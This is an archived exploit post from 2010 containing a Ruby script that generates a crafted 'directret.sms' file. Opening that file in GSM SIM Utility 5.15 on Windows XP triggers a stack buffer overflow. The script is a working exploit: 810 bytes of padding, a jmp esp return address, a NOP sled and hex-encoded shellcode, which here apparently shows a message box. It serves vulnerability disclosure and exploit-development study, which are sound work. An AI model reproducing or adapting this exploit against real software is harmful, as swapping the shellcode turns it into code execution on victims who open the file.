
GSM SIM Utility Direct Local Buffer Overflow

Posted Jul 8, 2010
Authored by chap0

GSM SIM Utility Direct RET local buffer overflow exploit. Affects version 5.15.

tags | exploit, overflow, local
MD5 | 055a6049a48a76b62d4168f558b26e50

# Exploit Title : GSM SIM Utility Local Exploit Direct Ret ver.
# Date : July 07, 2010
# Author : chap0 [www.seek-truth.net]
# Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol
# Version : 5.15
# OS : Windows XP SP3
# Greetz to : Special Greetz to Muts, The inspiration bro, I do Try Harder
# Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
# The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Code :
#!/usr/bin/ruby
puts '|------------------------------------------------------------------|'
puts '| __ __ |'
puts '| _________ ________ / /___ _____ / /____ ____ _____ ___ |'
puts '| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |'
puts '| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |'
puts '| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |'
puts '| |'
puts '| http://www.corelan.be:8800 |'
puts '| |'
puts '|-------------------------------------------------[ EIP Hunters ]--|'
puts '[*] GSM SIM Utility Local Exploit Direct Ret ver. by chap0.'
puts '[*] Visit seek-truth.net'

crash = "A" * 810
eip = "01524000" #jmp esp
nop = "90" * 10
#message box
code ="d9eb9bd97424f431d2b27a31c964"+
"8b71308b760c8b761c8b46088b7e"+
"208b36384f1875f35901d1ffe160"+
"8b6c24248b453c8b54057801ea8b"+
"4a188b5a2001ebe337498b348b01"+
"ee31ff31c0fcac84c0740ac1cf0d"+
"01c7e9f1ffffff3b7c242875de8b"+
"5a2401eb668b0c4b8b5a1c01eb8b"+
"048b01e88944241c61c3b20829d4"+
"89e589c2688e4e0eec52e89cffff"+
"ff894504bb7ed8e273871c2452e8"+
"8bffffff894508686c6c20ff6833"+
"322e646875736572885c240a89e6"+
"56ff550489c250bba8a24dbc871c"+
"2452e85effffff68703058206820"+
"6368616864206279686f69746568"+
"4578706c31db885c241289e36868"+
"5820206844656174682069732068"+
"2053696e6873206f666857616765"+
"685468652031c9884c241989e131"+
"d252535152ffd031c050ff5508"

payload = crash + eip + nop + code

sms = File.new( "directret.sms", "w" )
if sms
  sms.syswrite(payload)
else
  puts "Unable to create file."
end
